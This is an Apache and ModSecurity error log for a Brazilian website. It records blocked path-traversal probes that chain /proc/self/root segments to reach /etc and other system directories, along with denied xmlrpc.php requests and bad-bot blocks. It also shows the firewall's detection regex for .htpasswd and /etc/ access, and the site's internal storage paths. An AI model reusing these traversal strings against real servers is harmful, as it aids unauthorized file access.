[Tue Mar 17 23:33:00.179663 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:47908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboO3OoXxyEfFpUF8f8TlgAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 23:33:12.125883 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:45416] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:33:30.173310 2026] [access_compat:error] [pid 11816:tid 140411632822016] [client 195.123.216.134:42898] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 23:33:34.025813 2026] [proxy_fcgi:error] [pid 15051:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45794] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:33:55.105856 2026] [proxy_fcgi:error] [pid 17653:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46154] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:34:03.411204 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.243.128:54874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboPG-w_le52K8_3pV2FMQAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 23:34:13.635313 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.244.43:52820] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboPJew_le52K8_3pV2FOAAAAhQ"]
[Tue Mar 17 23:34:17.122144 2026] [proxy_fcgi:error] [pid 11816:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46470] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:34:29.247786 2026] [access_compat:error] [pid 17887:tid 140411649607424] [client 51.210.111.80:34597] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 23:34:40.125056 2026] [proxy_fcgi:error] [pid 17653:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:46800] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:34:54.173190 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.228.61:52394] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboPTimAPhZkrhU8w4kXHAAAAIs"]
[Tue Mar 17 23:35:03.717801 2026] [proxy_fcgi:error] [pid 16560:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47214] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:35:15.536802 2026] [core:alert] [pid 26799:tid 140411716749056] [client 74.7.243.128:44440] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/systemd
[Tue Mar 17 23:35:19.078049 2026] [mime_magic:error] [pid 17887:tid 140411574073088] (70014)End of file found: [client 74.7.243.128:40864] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/run
[Tue Mar 17 23:35:26.121784 2026] [proxy_fcgi:error] [pid 17653:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47700] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:35:31.792308 2026] [mime_magic:error] [pid 31803:tid 140411741927168] (70014)End of file found: [client 74.7.241.31:50110] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/sys/fs/cgroup/systemd/system.slice
[Tue Mar 17 23:35:31.792660 2026] [access_compat:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:50110] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/sys/fs/cgroup/systemd/system.slice
[Tue Mar 17 23:35:49.597813 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48012] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:35:59.796144 2026] [mime_magic:error] [pid 2598:tid 140411548894976] (70014)End of file found: [client 74.7.243.128:36704] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/include/rdma
[Tue Mar 17 23:35:59.796491 2026] [access_compat:error] [pid 2598:tid 140411548894976] [client 74.7.243.128:36704] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/include/rdma
[Tue Mar 17 23:36:03.854600 2026] [mime_magic:error] [pid 16560:tid 140411699963648] (70014)End of file found: [client 74.7.241.31:55178] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/sys/fs/cgroup/systemd/system.slice
[Tue Mar 17 23:36:03.854701 2026] [access_compat:error] [pid 16560:tid 140411699963648] [client 74.7.241.31:55178] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/sys/fs/cgroup/systemd/system.slice
[Tue Mar 17 23:36:13.037885 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48382] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:36:36.127907 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:48774] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:36:58.133815 2026] [proxy_fcgi:error] [pid 19507:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49196] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:37:22.034231 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49620] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:37:32.159810 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:52256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboP7Na6ubjKNq_cu4Y8wgAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 23:37:44.103639 2026] [proxy_fcgi:error] [pid 2598:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49884] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:38:07.102571 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50216] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:38:17.826429 2026] [:error] [pid 2598:tid 140411691570944] [client 74.7.243.128:57588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboQGRj0p0SRWAqcjGGw5gAAAwY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 23:38:30.127008 2026] [proxy_fcgi:error] [pid 11816:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50642] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:38:52.129771 2026] [proxy_fcgi:error] [pid 2598:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:50894] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:38:59.970389 2026] [:error] [pid 16560:tid 140411599251200] [client 74.7.243.128:59624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboQQ66gUSg3B_dEMdIc3QAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 23:39:01.338994 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:41134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboQRew_le52K8_3pV2F2QAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 23:39:14.077841 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51288] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:39:17.367161 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.244.43:41586] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboQVew_le52K8_3pV2F3AAAAhU"]
[Tue Mar 17 23:39:38.141784 2026] [proxy_fcgi:error] [pid 15826:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:51680] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:39:46.343448 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.241.31:33832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboQcimAPhZkrhU8w4kXpQAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 23:39:59.484693 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.228.61:55394] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboQfsdf6f5d65gmYZR2ggAAAtI"]
[Tue Mar 17 23:40:00.126082 2026] [proxy_fcgi:error] [pid 19507:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52076] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:40:21.089354 2026] [proxy_fcgi:error] [pid 15051:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52386] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:40:23.019058 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:41134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboQl-w_le52K8_3pV2GAQAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 23:40:42.123394 2026] [proxy_fcgi:error] [pid 19507:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52674] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:41:05.121846 2026] [proxy_fcgi:error] [pid 16560:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53058] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:41:27.121805 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53372] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:41:36.443990 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] [client 195.123.216.134:51806] AH01071: Got error 'Primary script unknown'
[Tue Mar 17 23:41:49.137802 2026] [proxy_fcgi:error] [pid 11816:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53686] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:41:53.062928 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:59784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboQ8QkwaGbbGflqUZC64QAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 23:42:11.121853 2026] [proxy_fcgi:error] [pid 15051:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54118] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:42:34.137790 2026] [proxy_fcgi:error] [pid 16560:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:54496] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:42:35.335814 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:56908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboRG8df6f5d65gmYZR25AAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 23:42:55.137770 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54846] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:43:16.129661 2026] [proxy_fcgi:error] [pid 15826:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55180] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:43:20.546910 2026] [mime_magic:error] [pid 19507:tid 140411616036608] (70014)End of file found: [client 74.7.241.31:60918] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/lib/cloud/instance
[Tue Mar 17 23:43:23.600781 2026] [access_compat:error] [pid 31803:tid 140411632822016] [client 195.123.216.134:52342] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 23:43:38.165774 2026] [proxy_fcgi:error] [pid 11816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55600] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:43:50.258143 2026] [access_compat:error] [pid 17887:tid 140411616036608] [client 64.64.99.30:59036] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 23:43:52.375006 2026] [access_compat:error] [pid 17887:tid 140411632822016] [client 95.181.235.137:59183] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 23:44:00.169867 2026] [proxy_fcgi:error] [pid 15051:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55984] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:44:03.770552 2026] [access_compat:error] [pid 26799:tid 140411725141760] [client 195.123.216.134:38908] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 23:44:06.237997 2026] [mime_magic:error] [pid 15051:tid 140411565680384] (70014)End of file found: [client 74.7.243.128:59834] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/lib/systemd/user
[Tue Mar 17 23:44:06.238152 2026] [access_compat:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:59834] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/lib/systemd/user
[Tue Mar 17 23:44:10.768666 2026] [access_compat:error] [pid 11816:tid 140411624429312] [client 216.73.216.191:56950] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Tue Mar 17 23:44:23.133797 2026] [proxy_fcgi:error] [pid 2598:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56372] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:44:24.854842 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.244.43:46802] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboRiOw_le52K8_3pV2GeAAAAgg"]
[Tue Mar 17 23:44:24.857262 2026] [access_compat:error] [pid 11816:tid 140411708356352] [client 51.210.104.64:56901] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 23:44:45.101826 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:56764] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:44:56.095134 2026] [access_compat:error] [pid 26799:tid 140411590858496] [client 51.210.105.30:39161] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
